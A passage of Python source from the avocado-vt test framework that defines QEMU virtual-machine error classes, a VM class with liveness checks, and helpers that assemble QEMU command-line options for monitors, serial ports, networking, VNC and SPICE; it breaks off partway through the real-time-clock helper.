"""
Utility classes and functions to handle Virtual Machine creation using qemu.
:copyright: 2008-2009, 2014 Red Hat Inc.
"""
import time
import os
import logging
import fcntl
import re
import commands
import aexpect
from avocado.core import exceptions
from avocado.utils import process
from avocado.utils import crypto
from .qemu_devices import qdevices, qcontainer
from . import utils_misc
from . import virt_vm
from . import test_setup
from . import qemu_monitor
from . import qemu_virtio_port
from . import remote
from . import data_dir
from . import utils_net
from . import arch
from . import storage
from . import error_context
class QemuSegFaultError(virt_vm.VMError):
def __init__(self, crash_message):
virt_vm.VMError.__init__(self, crash_message)
self.crash_message = crash_message
def __str__(self):
return "Qemu crashed: %s" % self.crash_message
class VMMigrateProtoUnsupportedError(virt_vm.VMMigrateProtoUnknownError):
"""
When QEMU tells us it doesn't know about a given migration protocol.
This usually happens when we're testing older QEMU. It makes sense to
skip the test in this situation.
"""
def __init__(self, protocol=None, output=None):
self.protocol = protocol
self.output = output
def __str__(self):
return ("QEMU reports it doesn't know migration protocol '%s'. "
"QEMU output: %s" % (self.protocol, self.output))
class KVMInternalError(virt_vm.VMError):
pass
class ImageUnbootableError(virt_vm.VMError):
def __init__(self, name):
virt_vm.VMError.__init__(self, name)
self.name = name
def __str__(self):
return ("VM '%s' can't bootup from image,"
" check your boot disk image file." % self.name)
def clean_tmp_files():
if os.path.isfile(CREATE_LOCK_FILENAME):
os.unlink(CREATE_LOCK_FILENAME)
CREATE_LOCK_FILENAME = os.path.join(data_dir.get_tmp_dir(),
'avocado-vt-vm-create.lock')
class VM(virt_vm.BaseVM):
"""
This class handles all basic VM operations.
"""
MIGRATION_PROTOS = ['rdma', 'x-rdma', 'tcp', 'unix', 'exec', 'fd']
# By default we inherit all timeouts from the base VM class except...
CLOSE_SESSION_TIMEOUT = 30
def __init__(self, name, params, root_dir, address_cache, state=None):
"""
Initialize the object and set a few attributes.
:param name: The name of the object
:param params: A dict containing VM params
(see method make_create_command for a full description)
:param root_dir: Base directory for relative filenames
:param address_cache: A dict that maps MAC addresses to IP addresses
:param state: If provided, use this as self.__dict__
"""
if state:
self.__dict__ = state
else:
self.process = None
self.serial_ports = []
self.serial_console_log = None
self.serial_console = None
self.virtio_console = None
self.redirs = {}
self.spice_options = {}
self.vnc_port = 5900
self.monitors = []
self.virtio_ports = [] # virtio_console / virtio_serialport
self.pci_assignable = None
self.uuid = None
self.vcpu_threads = []
self.vhost_threads = []
self.devices = None
self.logs = {}
self.remote_sessions = []
self.logsessions = {}
self.name = name
self.params = params
self.root_dir = root_dir
self.ip_version = self.params.get("ip_version", "ipv4")
self.address_cache = address_cache
self.index_in_use = {}
# This usb_dev_dict member stores usb controller and device info.
# It's a dict where each key is the id of a usb controller,
# and the value is a list containing the ids of the usb devices
# attached to that controller.
# A filled usb_dev_dict may look like:
# { "usb1" : ["stg1", "stg2", "stg3", "stg4", "stg5", "stg6"],
# "usb2" : ["stg7", "stg8"],
# ...
# }
# This structure can be used in usb hotplug/unplug tests.
self.usb_dev_dict = {}
self.driver_type = 'qemu'
self.params['driver_type_' + self.name] = self.driver_type
# virtnet init depends on vm_type/driver_type being set w/in params
super(VM, self).__init__(name, params)
# un-overwrite instance attribute, virtnet db lookups depend on this
if state:
self.instance = state['instance']
self.qemu_command = ''
self.start_time = 0.0
self.start_monotonic_time = 0.0
self.last_boot_index = 0
self.last_driver_index = 0
def verify_alive(self):
"""
Make sure the VM is alive and that the main monitor is responsive.
:raise VMDeadError: If the VM is dead
:raise: Various monitor exceptions if the monitor is unresponsive
"""
self.verify_disk_image_bootable()
self.verify_userspace_crash()
self.verify_kernel_crash()
self.verify_illegal_instruction()
self.verify_kvm_internal_error()
try:
virt_vm.BaseVM.verify_alive(self)
if self.monitor:
self.monitor.verify_responsive()
except virt_vm.VMDeadError:
raise virt_vm.VMDeadError(self.process.get_status(),
self.process.get_output())
def is_alive(self):
"""
Return True if the VM is alive and its monitor is responsive.
"""
return not self.is_dead() and (not self.catch_monitor or
self.catch_monitor.is_responsive())
def is_dead(self):
"""
Return True if the qemu process is dead.
"""
return not self.process or not self.process.is_alive()
def is_paused(self):
"""
Return True if the qemu process is paused ('stop'ed)
"""
if self.is_dead():
return False
try:
self.verify_status("paused")
return True
except virt_vm.VMStatusError:
return False
def verify_status(self, status):
"""
Check VM status
:param status: Optional VM status, 'running' or 'paused'
:raise VMStatusError: If the VM status is not the same as the parameter
"""
if not self.monitor.verify_status(status):
raise virt_vm.VMStatusError('Unexpected VM status: "%s"' %
self.monitor.get_status())
def verify_userspace_crash(self):
"""
Verify if the userspace component (qemu) crashed.
"""
if "(core dumped)" in self.process.get_output():
for line in self.process.get_output().splitlines():
if "(core dumped)" in line:
raise QemuSegFaultError(line)
def verify_kvm_internal_error(self):
"""
Verify KVM internal error.
"""
if "KVM internal error." in self.process.get_output():
out = self.process.get_output()
out = out[out.find("KVM internal error."):]
raise KVMInternalError(out)
def verify_disk_image_bootable(self):
if self.params.get("image_verify_bootable") == "yes":
pattern = self.params.get("image_unbootable_pattern")
if not pattern:
raise virt_vm.VMConfigMissingError(self.name,
"image_unbootable_pattern")
try:
seabios_log = self.logsessions['seabios'].get_output()
if re.search(pattern, seabios_log, re.S):
logging.error("Can't boot guest from image.")
# Set 'shutdown_command' to None to force autotest
# to shut down the guest via the monitor.
self.params["shutdown_command"] = None
raise ImageUnbootableError(self.name)
except KeyError:
pass
def clone(self, name=None, params=None, root_dir=None, address_cache=None,
copy_state=False):
"""
Return a clone of the VM object with optionally modified parameters.
The clone is initially not alive and needs to be started using create().
Any parameters not passed to this function are copied from the source
VM.
:param name: Optional new VM name
:param params: Optional new VM creation parameters
:param root_dir: Optional new base directory for relative filenames
:param address_cache: A dict that maps MAC addresses to IP addresses
:param copy_state: If True, copy the original VM's state to the clone.
Mainly useful for make_create_command().
"""
if name is None:
name = self.name
if params is None:
params = self.params.copy()
if root_dir is None:
root_dir = self.root_dir
if address_cache is None:
address_cache = self.address_cache
if copy_state:
state = self.__dict__.copy()
else:
state = None
return VM(name, params, root_dir, address_cache, state)
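# Illustrative usage of clone() (a sketch, not part of the API docs):
#   new_params = vm.params.copy()
#   new_params["mem"] = "2048"
#   new_vm = vm.clone(name="%s-clone" % vm.name, params=new_params)
#   new_vm.create()  # the clone is not alive until started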
def get_serial_console_filename(self, name=None):
"""
Return the serial console filename.
:param name: The serial port name.
"""
if name:
return os.path.join(data_dir.get_tmp_dir(),
"serial-%s-%s" % (name, self.instance))
return os.path.join(data_dir.get_tmp_dir(),
"serial-%s" % self.instance)
def get_serial_console_filenames(self):
"""
Return a list of all serial console filenames
(as specified in the VM's params).
"""
return [self.get_serial_console_filename(_) for _ in
self.params.objects("serials")]
def get_virtio_port_filenames(self):
"""
Get the socket files of the virtio ports
"""
return [_.hostfile for _ in self.virtio_ports]
def cleanup_serial_console(self):
"""
Close serial console and associated log file
"""
for console_type in ["virtio_console", "serial_console"]:
if hasattr(self, console_type):
console = getattr(self, console_type)
if console:
console.close()
setattr(self, console_type, None)
if hasattr(self, "migration_file"):
try:
os.unlink(self.migration_file)
except OSError:
pass
def make_create_command(self, name=None, params=None, root_dir=None):
"""
Generate a qemu command line. All parameters are optional. If a
parameter is not supplied, the corresponding value stored in the
class attributes is used.
:param name: The name of the object
:param params: A dict containing VM params
:param root_dir: Base directory for relative filenames
:note: The params dict should contain:
mem -- memory size in MBs
cdrom -- ISO filename to use with the qemu -cdrom parameter
extra_params -- a string to append to the qemu command
shell_port -- port of the remote shell daemon on the guest
(SSH, Telnet or the home-made Remote Shell Server)
shell_client -- client program to use for connecting to the
remote shell daemon on the guest (ssh, telnet or nc)
x11_display -- if specified, the DISPLAY environment variable
will be set to this value for the qemu process (useful for
SDL rendering)
images -- a list of image object names, separated by spaces
nics -- a list of NIC object names, separated by spaces
For each image in images:
drive_format -- string to pass as 'if' parameter for this
image (e.g. ide, scsi)
image_snapshot -- if yes, pass 'snapshot=on' to qemu for
this image
image_boot -- if yes, pass 'boot=on' to qemu for this image
In addition, all parameters required by get_image_filename.
For each NIC in nics:
nic_model -- string to pass as 'model' parameter for this
NIC (e.g. e1000)
"""
# Helper function for command line option wrappers
def _add_option(option, value, option_type=None, first=False):
"""
Add option to qemu parameters.
"""
if first:
fmt = " %s=%s"
else:
fmt = ",%s=%s"
if option_type is bool:
# Decode value for bool parameter (supports True, False, None)
if value in ['yes', 'on', True]:
return fmt % (option, "on")
elif value in ['no', 'off', False]:
return fmt % (option, "off")
elif value and isinstance(value, bool):
return fmt % (option, "on")
elif value and isinstance(value, str):
# "EMPTY_STRING" and "NULL_STRING" is used for testing illegal
# foramt of option.
# "EMPTY_STRING": set option as a empty string "".
# "NO_EQUAL_STRING": set option as a option string only,
# even without "=".
# (In most case, qemu-kvm should recognize it as "<null>")
if value == "NO_EQUAL_STRING":
return ",%s" % option
if value == "EMPTY_STRING":
value = '""'
return fmt % (option, str(value))
return ""
# Wrappers for all supported qemu command line parameters.
# This is meant to allow support for multiple qemu versions.
# Each of these functions receives the output of 'qemu -help'
# as a parameter, and should add the requested command line
# option accordingly.
def add_name(name):
return " -name '%s'" % name
def process_sandbox(devices, action):
if action == "add":
if devices.has_option("sandbox"):
return " -sandbox on "
elif action == "rem":
if devices.has_option("sandbox"):
return " -sandbox off "
def add_human_monitor(devices, monitor_name, filename):
if not devices.has_option("chardev"):
return " -monitor unix:'%s',server,nowait" % filename
monitor_id = "hmp_id_%s" % monitor_name
cmd = " -chardev socket"
cmd += _add_option("id", monitor_id)
cmd += _add_option("path", filename)
cmd += _add_option("server", "NO_EQUAL_STRING")
cmd += _add_option("nowait", "NO_EQUAL_STRING")
cmd += " -mon chardev=%s" % monitor_id
cmd += _add_option("mode", "readline")
return cmd
def add_qmp_monitor(devices, monitor_name, filename):
if not devices.has_option("qmp"):
logging.warn("Fallback to human monitor since qmp is"
" unsupported")
return add_human_monitor(devices, monitor_name, filename)
if not devices.has_option("chardev"):
return " -qmp unix:'%s',server,nowait" % filename
monitor_id = "qmp_id_%s" % monitor_name
cmd = " -chardev socket"
cmd += _add_option("id", monitor_id)
cmd += _add_option("path", filename)
cmd += _add_option("server", "NO_EQUAL_STRING")
cmd += _add_option("nowait", "NO_EQUAL_STRING")
cmd += " -mon chardev=%s" % monitor_id
cmd += _add_option("mode", "control")
return cmd
def add_serial(devices, name, filename):
if (not devices.has_option("chardev") or
not any(devices.has_device(dev)
for dev in ("isa-serial", "sclpconsole", "spapr-vty"))):
return " -serial unix:'%s',server,nowait" % filename
serial_id = "serial_id_%s" % name
cmd = " -chardev socket"
cmd += _add_option("id", serial_id)
cmd += _add_option("path", filename)
cmd += _add_option("server", "NO_EQUAL_STRING")
cmd += _add_option("nowait", "NO_EQUAL_STRING")
if '86' in params.get('vm_arch_name', arch.ARCH):
cmd += " -device isa-serial"
elif 'ppc' in params.get('vm_arch_name', arch.ARCH):
cmd += " -device spapr-vty"
# Workaround for console issue, details:
# lists.gnu.org/archive/html/qemu-ppc/2013-10/msg00129.html
cmd += _add_option("reg", "0x30000000")
elif 's390x' in params.get('vm_arch_name', arch.ARCH):
# Only for the s390x console:
# this is the only console option supported now.
cmd += " -device sclpconsole"
cmd += _add_option("chardev", serial_id)
return cmd
def add_chardev(devices, params, qid=None):
"""
Generate qdevices.CharDevice object
:param devices: device container object
:param params: dict to create char device object
:param qid: char device ID
"""
if not devices.has_option("chardev"):
logging.warn("'chardev' option not support")
return None
dynamic = False
chardev = qdevices.CharDevice(params=params)
if not qid:
qid = utils_misc.generate_random_id()
dynamic = True
chardev.set_param("id", qid, dynamic=dynamic)
return chardev
def add_virtio_port(devices, chardev, params, name, bus, index=None):
"""
Appends virtio_serialport or virtio_console device to cmdline.
:param chardev: qdevices.CharDevice object
:param params: Space-separated chardev params
:param name: Name of the port
:param bus: Which virtio-serial-pci device to use
:param index: Index of the current virtio_port
"""
def get_extra_options(params):
"""Get extra params pairs"""
options = dict()
extra_params = params.get('virtio_port_params', '')
for _ in extra_params.split():
try:
if "=" not in _:
key, value = _, "NO_EQUAL_STRING"
else:
key, value = _.split('=')
options[key] = value
except Exception:
options.clear()
msg = ("Invaild params %s in " % _ +
"'virtio_port_param' = %s" % extra_params)
logging.error(msg)
return options
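# For example (illustrative): virtio_port_params = "nr=3 unsafe"
# yields {'nr': '3', 'unsafe': 'NO_EQUAL_STRING'}; each pair is
# later applied to the port via set_param().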
# used by spiceagent (com.redhat.spice.*)
if 'console' in params.get('virtio_port_type'):
port_type = 'virtconsole'
else:
port_type = 'virtserialport'
virtio_port = QDevice(port_type)
virtio_port.set_param("bus", bus)
if params.get('virtio_port_name_prefix'):
prefix = params["virtio_port_name_prefix"]
name = "%s%d" % (prefix, index)
virtio_port.set_param("name", name)
virtio_port.set_param("chardev", chardev.get_qid())
for key, value in get_extra_options(params).items():
virtio_port.set_param(key, value)
if not virtio_port.get_param("id"):
devid = utils_misc.generate_random_id()
virtio_port.set_param("id", devid, dynamic=True)
return virtio_port
def add_log_seabios(devices):
if not devices.has_device("isa-debugcon"):
return ""
default_id = "seabioslog_id_%s" % self.instance
filename = os.path.join(data_dir.get_tmp_dir(),
"seabios-%s" % self.instance)
self.logs["seabios"] = filename
cmd = " -chardev socket"
cmd += _add_option("id", default_id)
cmd += _add_option("path", filename)
cmd += _add_option("server", "NO_EQUAL_STRING")
cmd += _add_option("nowait", "NO_EQUAL_STRING")
cmd += " -device isa-debugcon"
cmd += _add_option("chardev", default_id)
cmd += _add_option("iobase", "0x402")
return cmd
def add_log_anaconda(devices, pci_bus='pci.0'):
chardev_id = "anacondalog_chardev_%s" % self.instance
vioser_id = "anacondalog_vioser_%s" % self.instance
filename = os.path.join(data_dir.get_tmp_dir(),
"anaconda-%s" % self.instance)
self.logs["anaconda"] = filename
dev = qdevices.QCustomDevice('chardev', backend='backend')
dev.set_param('backend', 'socket')
dev.set_param('id', chardev_id)
dev.set_param("path", filename)
dev.set_param("server", 'NO_EQUAL_STRING')
dev.set_param("nowait", 'NO_EQUAL_STRING')
devices.insert(dev)
if params.get('machine_type').startswith("arm64-mmio"):
dev = QDevice('virtio-serial-device')
else:
dev = QDevice('virtio-serial-pci', parent_bus=pci_bus)
dev.set_param("id", vioser_id)
devices.insert(dev)
dev = QDevice('virtserialport')
dev.set_param("bus", "%s.0" % vioser_id)
dev.set_param("chardev", chardev_id)
dev.set_param("name", "org.fedoraproject.anaconda.log.0")
devices.insert(dev)
def add_smp(devices):
smp_str = " -smp %d" % self.cpuinfo.smp
smp_pattern = "smp .*n\[,maxcpus=cpus\].*"
if devices.has_option(smp_pattern):
smp_str += ",maxcpus=%d" % self.cpuinfo.maxcpus
smp_str += ",cores=%d" % self.cpuinfo.cores
smp_str += ",threads=%d" % self.cpuinfo.threads
smp_str += ",sockets=%d" % self.cpuinfo.sockets
return smp_str
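# Illustrative add_smp() output (assuming the maxcpus pattern is
# supported and cpuinfo holds smp=4, maxcpus=4, cores=2, threads=1,
# sockets=2):
#   " -smp 4,maxcpus=4,cores=2,threads=1,sockets=2"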
def add_nic(devices, vlan, model=None, mac=None, device_id=None,
netdev_id=None, nic_extra_params=None, pci_addr=None,
bootindex=None, queues=1, vectors=None, pci_bus='pci.0',
ctrl_mac_addr=None):
if model == 'none':
return
if devices.has_option("device"):
if not model:
model = "rtl8139"
elif model == "virtio":
machine_type = self.params.get("machine_type")
if "s390" in machine_type:
model = "virtio-net-ccw"
elif "mmio" in machine_type:
model = "virtio-net-device"
else:
model = "virtio-net-pci"
dev = QDevice(model)
if ctrl_mac_addr and ctrl_mac_addr in ["on", "off"]:
dev.set_param('ctrl_mac_addr', ctrl_mac_addr)
dev.set_param('mac', mac, dynamic=True)
# Only pci domain=0,bus=0,function=0 is supported for now.
#
# libvirt obtains the pci_slot (free pci addr) here by
# parsing the xml file, i.e. counting all the pci devices
# and storing the number.
if model == 'virtio-net-device':
dev.parent_bus = {'type': 'virtio-bus'}
elif model == 'virtio-net-ccw': # For s390x platform
dev.parent_bus = {'type': 'virtio-bus'}
elif model != 'spapr-vlan':
dev.parent_bus = pci_bus
dev.set_param('addr', pci_addr)
if nic_extra_params:
nic_extra_params = (_.split('=', 1) for _ in
nic_extra_params.split(',') if _)
for key, val in nic_extra_params:
dev.set_param(key, val)
dev.set_param("bootindex", bootindex)
if 'aarch64' in params.get('vm_arch_name', arch.ARCH):
if "rombar" in devices.execute_qemu("-device %s,?"
% model):
dev.set_param("rombar", 0)
else:
dev = qdevices.QCustomDevice('net', backend='type')
dev.set_param('type', 'nic')
dev.set_param('model', model)
dev.set_param('macaddr', mac, 'NEED_QUOTE', True)
dev.set_param('id', device_id, 'NEED_QUOTE')
if "virtio" in model:
if int(queues) > 1:
dev.set_param('mq', 'on')
if vectors:
dev.set_param('vectors', vectors)
if devices.has_option("netdev"):
dev.set_param('netdev', netdev_id)
else:
dev.set_param('vlan', vlan)
devices.insert(dev)
def add_net(devices, vlan, nettype, ifname=None, tftp=None,
bootfile=None, hostfwd=[], netdev_id=None,
netdev_extra_params=None, tapfds=None, script=None,
downscript=None, vhost=None, queues=None, vhostfds=None,
add_queues=None, helper=None, add_tapfd=None,
add_vhostfd=None, vhostforce=None):
mode = None
if nettype in ['bridge', 'network', 'macvtap']:
mode = 'tap'
elif nettype == 'user':
mode = 'user'
else:
logging.warning("Unknown/unsupported nettype %s" % nettype)
return ''
if devices.has_option("netdev"):
cmd = " -netdev %s,id=%s" % (mode, netdev_id)
cmd_nd = cmd
if vhost:
if vhost in ["on", "off"]:
cmd += ",vhost=%s" % vhost
elif vhost == "vhost=on": # Keeps compatibility with old.
cmd += ",%s" % vhost
cmd_nd = cmd
if vhostfds:
if (int(queues) > 1 and
'vhostfds=' in devices.get_help_text()):
cmd += ",vhostfds=%(vhostfds)s"
cmd_nd += ",vhostfds=DYN"
else:
txt = ""
if int(queues) > 1:
txt = "qemu do not support vhost multiqueue,"
txt += " Fall back to single queue."
if 'vhostfd=' in devices.get_help_text():
cmd += ",vhostfd=%(vhostfd)s"
cmd_nd += ",vhostfd=DYN"
else:
txt += " qemu do not support vhostfd."
if txt:
logging.warn(txt)
# For negative test
if add_vhostfd:
cmd += ",vhostfd=%(vhostfd)s"
cmd_nd += ",vhostfd=%(vhostfd)s"
if vhostforce in ["on", "off"]:
cmd += ",vhostforce=%s" % vhostforce
cmd_nd = cmd
if netdev_extra_params:
cmd += "%s" % netdev_extra_params
cmd_nd += "%s" % netdev_extra_params
else:
cmd = " -net %s,vlan=%d" % (mode, vlan)
cmd_nd = cmd
if mode == "tap":
if script:
cmd += ",script='%s'" % script
cmd += ",downscript='%s'" % (downscript or "no")
cmd_nd = cmd
if ifname:
cmd += ",ifname='%s'" % ifname
cmd_nd = cmd
elif tapfds:
if (int(queues) > 1 and
',fds=' in devices.get_help_text()):
cmd += ",fds=%(tapfds)s"
cmd_nd += ",fds=DYN"
else:
cmd += ",fd=%(tapfd)s"
cmd_nd += ",fd=DYN"
# For negative test
if add_tapfd:
cmd += ",fd=%(tapfd)s"
cmd_nd += ",fd=%(tapfd)s"
elif mode == "user":
if tftp and "[,tftp=" in devices.get_help_text():
cmd += ",tftp='%s'" % tftp
cmd_nd = cmd
if bootfile and "[,bootfile=" in devices.get_help_text():
cmd += ",bootfile='%s'" % bootfile
cmd_nd = cmd
if "[,hostfwd=" in devices.get_help_text():
for i in xrange(len(hostfwd)):
cmd += (",hostfwd=tcp::%%(host_port%d)s"
"-:%%(guest_port%d)s" % (i, i))
cmd_nd += ",hostfwd=tcp::DYN-:%%(guest_port)ds"
if add_queues and queues:
cmd += ",queues=%s" % queues
cmd_nd += ",queues=%s" % queues
if helper:
cmd += ",helper=%s" % helper
cmd_nd += ",helper=%s" % helper
return cmd, cmd_nd
def add_floppy(filename, index):
cmd_list = [" -fda '%s'", " -fdb '%s'"]
return cmd_list[index] % filename
def add_tftp(devices, filename):
# If the new syntax is supported, don't add -tftp
if "[,tftp=" in devices.get_help_text():
return ""
else:
return " -tftp '%s'" % filename
def add_bootp(devices, filename):
# If the new syntax is supported, don't add -bootp
if "[,bootfile=" in devices.get_help_text():
return ""
else:
return " -bootp '%s'" % filename
def add_tcp_redir(devices, host_port, guest_port):
# If the new syntax is supported, don't add -redir
if "[,hostfwd=" in devices.get_help_text():
return ""
else:
return " -redir tcp:%s::%s" % (host_port, guest_port)
def add_vnc(vnc_port, vnc_password='no', extra_params=None):
vnc_cmd = " -vnc :%d" % (vnc_port - 5900)
if vnc_password == "yes":
vnc_cmd += ",password"
if extra_params:
vnc_cmd += ",%s" % extra_params
return vnc_cmd
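# Illustrative add_vnc() output (a sketch): add_vnc(5901, "yes")
# returns " -vnc :1,password", since display numbers are offset
# from port 5900.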
def add_sdl(devices):
if devices.has_option("sdl"):
return " -sdl"
else:
return ""
def add_nographic():
return " -nographic"
def add_uuid(uuid):
return " -uuid '%s'" % uuid
def add_qemu_option(devices, name, optsinfo):
"""
Add qemu option, such as '-msg timestamp=on|off'
:param devices: qcontainer object
:param name: string type option name
:param optsinfo: list like [(key, val, vtype)]
"""
if devices.has_option(name):
options = []
for info in optsinfo:
key, val = info[:2]
if key and val:
options.append("%s=%%(%s)s" % (key, key))
else:
options += filter(None, info[:2])
options = ",".join(options)
cmdline = "-%s %s" % (name, options)
device = qdevices.QStringDevice(name, cmdline=cmdline)
for info in optsinfo:
key, val, vtype = info
if key and val:
device.set_param(key, val, vtype, False)
devices.insert(device)
else:
logging.warn("option '-%s' not supportted" % name)
def add_pcidevice(devices, host, params, device_driver="pci-assign",
pci_bus='pci.0'):
if devices.has_device(device_driver):
dev = QDevice(device_driver, parent_bus=pci_bus)
else:
dev = qdevices.QCustomDevice('pcidevice', parent_bus=pci_bus)
help_cmd = "%s -device %s,\? 2>&1" % (qemu_binary, device_driver)
pcidevice_help = process.system_output(help_cmd,
shell=True,
verbose=False)
dev.set_param('host', host)
dev.set_param('id', 'id_%s' % host.replace(":", "."))
fail_param = []
for param in params.get("pci-assign_params", "").split():
value = params.get(param)
if value:
if param in pcidevice_help:
dev.set_param(param, value)
else:
fail_param.append(param)
if fail_param:
msg = ("parameter %s is not support in device pci-assign."
" It only support following parameter:\n %s" %
(", ".join(fail_param), pcidevice_help))
logging.warn(msg)
devices.insert(dev)
def add_virtio_rng(devices, rng_params, parent_bus="pci.0"):
"""
Add virtio-rng device.
:param devices: qcontainer object to contain devices.
:param rng_params: dict that includes virtio_rng device params.
:param parent_bus: parent bus for virtio-rng-pci.
"""
def set_dev_params(dev, dev_params,
dev_backend, backend_type):
"""
Set QCustomDevice properties by user params dict.
"""
for pro, val in dev_params.iteritems():
suffix = "_%s" % backend_type
if pro.endswith(suffix):
idx = len(suffix)
dev.set_param(pro[:-idx], val)
if dev_backend:
dev.set_param("backend", dev_backend)
dev_id = utils_misc.generate_random_string(8)
dev_id = "%s-%s" % (backend_type, dev_id)
dev.set_param("id", dev_id)
dev_type = "virtio-rng-pci"
if devices.has_device(dev_type):
rng_pci = QDevice(dev_type, parent_bus=parent_bus)
set_dev_params(rng_pci, rng_params, None, dev_type)
rng_dev = qdevices.QCustomDevice(dev_type="object",
backend="backend")
backend = rng_params["backend"]
backend_type = rng_params["backend_type"]
set_dev_params(rng_dev, rng_params, backend, backend_type)
if backend_type == "chardev":
backend = rng_params["chardev_backend"]
backend_type = rng_params["%s_type" % backend]
char_dev = qdevices.QCustomDevice(dev_type="chardev",
backend="backend")
set_dev_params(char_dev, rng_params,
backend, backend_type)
rng_dev.set_param("chardev", char_dev.get_qid())
devices.insert(char_dev)
devices.insert(rng_dev)
rng_pci.set_param("rng", rng_dev.get_qid())
devices.insert(rng_pci)
def add_memorys(devices, params):
"""
Add memory controller by params
:param devices: VM devices container
"""
options = []
params = params.object_params("mem")
if params.get("mem"):
options.append("%s" % params["mem"])
if params.get("slots") and params.get("maxmem"):
options.append("slots=%s" % params["slots"])
options.append("maxmem=%s" % params["maxmem"])
if not options:
return devices
cmdline = "-m %s" % ",".join(options)
dev = StrDev("mem", cmdline=cmdline)
devices.insert(dev)
for name in params.objects("mem_devs"):
mem_params = params.object_params(name)
memdevs = devices.memory_define_by_params(mem_params, name)
devices.insert(memdevs)
return devices
def add_spice_rhel5(devices, spice_params, port_range=(3100, 3199)):
"""
Processes spice parameters on a rhel5 host.
:param spice_params: string of space-separated spice options
:param port_range: tuple with port range, default: (3100, 3199)
"""
if devices.has_option("spice"):
cmd = " -spice"
else:
return ""
spice_help = ""
if devices.has_option("spice-help"):
spice_help = commands.getoutput("%s -device \\?" % qemu_binary)
s_port = str(utils_misc.find_free_port(*port_range))
self.spice_options['spice_port'] = s_port
cmd += " port=%s" % s_port
for param in spice_params.split():
value = params.get(param)
if value:
if bool(re.search(param, spice_help, re.M)):
cmd += ",%s=%s" % (param, value)
else:
msg = ("parameter %s is not supported in spice. It "
"only supports the following parameters:\n %s"
% (param, spice_help))
logging.warn(msg)
else:
cmd += ",%s" % param
if devices.has_option("qxl"):
qxl_dev_nr = params.get("qxl_dev_nr", 1)
cmd += " -qxl %s" % qxl_dev_nr
return cmd
def add_spice(port_range=(3000, 3199),
tls_port_range=(3200, 3399)):
"""
Processes spice parameters.
:param port_range: tuple with port range, default: (3000, 3199)
:param tls_port_range: tuple with tls port range,
default: (3200, 3399)
"""
spice_opts = [] # will be used for ",".join()
tmp = None
def optget(opt):
"""a helper function"""
return self.spice_options.get(opt)
def set_yes_no_value(key, yes_value=None, no_value=None):
"""just a helper function"""
tmp = optget(key)
if tmp == "no" and no_value:
spice_opts.append(no_value)
elif tmp == "yes" and yes_value:
spice_opts.append(yes_value)
def set_value(opt_string, key, fallback=None):
"""just a helper function"""
tmp = optget(key)
if tmp:
spice_opts.append(opt_string % tmp)
elif fallback:
spice_opts.append(fallback)
s_port = str(utils_misc.find_free_port(*port_range))
if optget("spice_port") == "generate":
if not self.is_alive():
self.spice_options['spice_port'] = s_port
spice_opts.append("port=%s" % s_port)
self.spice_port = s_port
else:
self.spice_options['spice_port'] = self.spice_port
spice_opts.append("port=%s" % self.spice_port)
else:
set_value("port=%s", "spice_port")
set_value("password=%s", "spice_password", "disable-ticketing")
if optget("listening_addr") == "ipv4":
host_ip = utils_net.get_host_ip_address(self.params)
self.spice_options['listening_addr'] = "ipv4"
spice_opts.append("addr=%s" % host_ip)
# set_value("addr=%s", "listening_addr", )
elif optget("listening_addr") == "ipv6":
host_ip = utils_net.get_host_ip_address(self.params)
host_ip_ipv6 = utils_misc.convert_ipv4_to_ipv6(host_ip)
self.spice_options['listening_addr'] = "ipv6"
spice_opts.append("addr=%s" % host_ip_ipv6)
set_yes_no_value(
"disable_copy_paste", yes_value="disable-copy-paste")
set_value("addr=%s", "spice_addr")
if optget("spice_ssl") == "yes":
# SSL only part
t_port = str(utils_misc.find_free_port(*tls_port_range))
if optget("spice_tls_port") == "generate":
if not self.is_alive():
self.spice_options['spice_tls_port'] = t_port
spice_opts.append("tls-port=%s" % t_port)
self.spice_tls_port = t_port
else:
self.spice_options[
'spice_tls_port'] = self.spice_tls_port
spice_opts.append("tls-port=%s" % self.spice_tls_port)
else:
set_value("tls-port=%s", "spice_tls_port")
prefix = optget("spice_x509_prefix")
if ((prefix is None or not os.path.exists(prefix)) and
(optget("spice_gen_x509") == "yes")):
# Generating spice_x509_* is not always necessary;
# regenerating them will make your existing VM no
# longer accessible via encrypted spice.
c_subj = optget("spice_x509_cacert_subj")
s_subj = optget("spice_x509_server_subj")
# If CN is not specified, add IP of host
if s_subj[-3:] == "CN=":
s_subj += utils_net.get_host_ip_address(self.params)
passwd = optget("spice_x509_key_password")
secure = optget("spice_x509_secure")
utils_misc.create_x509_dir(prefix, c_subj, s_subj, passwd,
secure)
tmp = optget("spice_x509_dir")
if tmp == "yes":
spice_opts.append("x509-dir=%s" % (prefix))
elif tmp == "no":
cacert = optget("spice_x509_cacert_file")
server_key = optget("spice_x509_key_file")
server_cert = optget("spice_x509_cert_file")
keyfile_str = ("x509-key-file=%s,x509-cacert-file=%s,"
"x509-cert-file=%s" %
(os.path.join(prefix, server_key),
os.path.join(prefix, cacert),
os.path.join(prefix, server_cert)))
spice_opts.append(keyfile_str)
set_yes_no_value("spice_x509_secure",
yes_value="x509-key-password=%s" %
(optget("spice_x509_key_password")))
tmp = optget("spice_secure_channels")
if tmp:
for item in tmp.split(","):
spice_opts.append("tls-channel=%s" % (item.strip()))
# Less common options
set_value("seamless-migration=%s", "spice_seamless_migration")
set_value("image-compression=%s", "spice_image_compression")
set_value("jpeg-wan-compression=%s", "spice_jpeg_wan_compression")
set_value("zlib-glz-wan-compression=%s",
"spice_zlib_glz_wan_compression")
set_value("streaming-video=%s", "spice_streaming_video")
set_value("agent-mouse=%s", "spice_agent_mouse")
set_value("playback-compression=%s", "spice_playback_compression")
set_yes_no_value("spice_ipv4", yes_value="ipv4")
set_yes_no_value("spice_ipv6", yes_value="ipv6")
return " -spice %s" % (",".join(spice_opts))
def add_qxl(qxl_nr, base_addr=29):
"""
adds extra qxl devices
:param qxl_nr: total number of qxl devices
:param base_addr: base address of extra qxl device
"""
qxl_str = ""
for index in range(1, qxl_nr):
addr = base_addr + index
qxl_str += " -device qxl,id=video%d,addr=0x%x" % (index, addr)
return qxl_str
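# Illustrative add_qxl() output (a sketch): add_qxl(3, 29) adds two
# extra devices:
#   " -device qxl,id=video1,addr=0x1e -device qxl,id=video2,addr=0x1f"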
def add_vga(vga):
return " -vga %s" % vga
def add_kernel(filename):
return " -kernel '%s'" % filename
def add_initrd(filename):
return " -initrd '%s'" % filename
def add_rtc(devices):
# Note that rtc-td-hack is for early qemu versions
# if "rtc " in help:
if devices.has_option("rtc"):
cmd = " -rtc base=%s" % params.get("rtc_base", "utc")
cmd += _add_option("clock", params.get("rtc_clock", "host"))
